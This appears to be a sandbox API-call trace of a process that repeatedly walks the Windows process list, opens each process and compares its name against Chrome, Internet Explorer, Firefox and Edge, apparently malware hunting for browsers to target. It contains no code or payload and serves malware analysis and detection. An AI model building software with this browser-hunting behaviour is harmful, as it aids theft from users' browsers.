	[0251.515] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa2c8
	[0251.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.517] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.518] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.518] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.518] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.518] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa2cc
	[0251.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.521] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.521] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.521] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.522] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.522] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa2d0
	[0251.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.523] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0251.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.524] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.524] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0251.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.524] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa2d4
	[0251.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.526] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.526] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.526] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.527] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa2d8
	[0251.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.528] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.528] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.529] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.529] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa2dc
	[0251.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.530] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0251.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.530] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.531] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0251.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.531] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa2e0
	[0251.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.532] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.533] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.533] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.533] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa2e4
	[0251.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.534] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0251.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.535] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.535] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0251.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.536] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa2e8
	[0251.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.537] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.537] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.538] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.538] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa2ec
	[0251.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.539] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0251.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.539] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.540] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0251.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.540] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa2f0
	[0251.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.541] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.542] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.542] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.543] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.543] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa2f4
	[0251.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.544] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0251.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.544] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.544] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0251.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.545] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.545] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0251.546] CloseHandle (hObject=0x4fd0) returned 1
	[0251.546] Sleep (dwMilliseconds=0x64) 
	[0251.657] GetCurrentProcessId () returned 0x110
	[0251.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0251.660] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0251.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0251.662] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0251.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa2f8
	[0251.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.663] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.663] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.663] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.664] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.664] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa2fc
	[0251.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.665] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.665] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.665] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.666] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0251.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa300
	[0251.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.667] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0251.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.667] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.668] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0251.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.668] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.668] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa304
	[0251.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.669] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.670] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.670] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.670] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.670] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0251.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa308
	[0251.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.671] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0251.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.672] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.672] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0251.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.672] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0251.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa30c
	[0251.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.673] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0251.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.674] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.674] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0251.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.674] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0251.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa310
	[0251.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.676] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0251.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.676] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.676] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0251.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.677] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0251.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa314
	[0251.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.678] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.678] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.678] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.678] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa318
	[0251.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.679] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.680] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.680] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.680] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa31c
	[0251.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.681] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.682] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.682] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.682] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa320
	[0251.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.683] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.684] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.684] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.685] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.685] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa324
	[0251.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.686] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
